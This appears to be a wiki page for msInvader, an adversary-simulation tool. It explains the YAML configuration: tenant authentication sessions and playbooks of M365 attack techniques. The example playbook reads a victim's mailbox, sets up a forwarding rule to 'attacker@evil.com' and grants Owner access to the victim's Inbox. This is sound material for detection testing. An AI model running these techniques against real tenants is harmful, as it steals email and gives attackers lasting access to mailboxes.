Skip to content

msInvader Configuration File

Jump to bottom
mvelazco edited this page Dec 17, 2024 · 15 revisions

The YAML configuration file is crucial for customizing and running simulations with msInvader.

Configuration Structure

The YAML configuration file for msInvader now consists of two main sections: authentication and playbooks. Here's an overview of the updated file structure:

authentication:
  # Tenant-level authentication details
  sessions:
    # Reusable authentication contexts

playbooks:
  # Playbooks containing techniques and their parameters

Authentication Section

This section contains tenant-level details required for msInvader to interact with M365 and Azure environments. It now includes a sessions subsection, which defines reusable authentication contexts for different users or accounts.

Fields Description:

  • tenant_id: The unique identifier of the Azure or O365 tenant that the application is registering with. Required for all authentication flows.

Sessions Subsection

The sessions subsection defines reusable authentication contexts under the authentication section. Each session specifies the authentication type and relevant credentials.

Fields Description:

  • type: The authentication flow to use. Supported types:
    • resource_owner: Resource Owner Password Credentials flow.
    • device_code: Device Code flow (supports MFA-enabled accounts).
  • username: The username or email address for authentication.
  • password: The password for Resource Owner Password Credentials flow.

Example:

authentication:

   tenant_id: "e523a1f3-31dc-45be-94ab-6a97be8d8cf8"

   sessions:

     compromised_user_1:
       type: "resource_owner"
       username: "victim1@contoso.com"
       password: "SuperPass!!!"

     compromised_user_2:
       type: "device_code"
       username: "victim2@contoso.com"

     compromised_service_principal:
       type: "client_credentials"
       app_id: "10c8885b-1c37-4a4a-8adc-a5e507e403a8"
       secret: "SuperSPS3cret"

Playbooks Section

The playbooks section groups techniques into logical workflows, making it easier to simulate adversary scenarios. Each playbook has a name, description, and a list of techniques.

Fields Description:

  • name: The name of the playbook.
  • description: A brief explanation of the playbook's purpose.
  • techniques: A list of techniques to simulate.
    • technique: Name of the technique.
    • enabled: Boolean (True or False) to activate the technique.
    • parameters: Nested key-value pairs defining technique-specific settings.
      • session: Specifies the session to use for authentication.
      • access_method: Defines the API used (graph, ews, or rest).

Example:

playbooks:
  - name: "M365 Adversary Simulation"
    description: "Simulate email manipulation techniques."
    techniques:
      - technique: "read_email"
        enabled: True
        parameters:
          session: "compromised_user_1"
          access_method: "graph"
          mailbox: "victim1@contoso.com"
          limit: 10

      - technique: "create_rule"
        enabled: True
        parameters:
          session: "compromised_user_1"
          access_method: "graph"
          mailbox: "victim1@contoso.com"
          rule_name: "Forward Emails"
          forward_to: "attacker@evil.com"

      - technique: "add_folder_permission"
        enabled: True
        parameters:
          session: "compromised_user_2"
          access_method: "rest"
          mailbox: "victim2@contoso.com"
          folder: "Inbox"
          grantee: "Default"
          access_rights: "Owner"

Configuring Your File

  1. Define Authentication: Start by setting up the authentication section to ensure msInvader can authenticate with the necessary services.
  2. Select Techniques: Activate the techniques you wish to simulate by setting enabled to True and filling out their respective parameters.
  3. Customize Parameters: Adjust each technique's parameters to tailor the simulation to your specific needs and scenarios.
Clone this wiki locally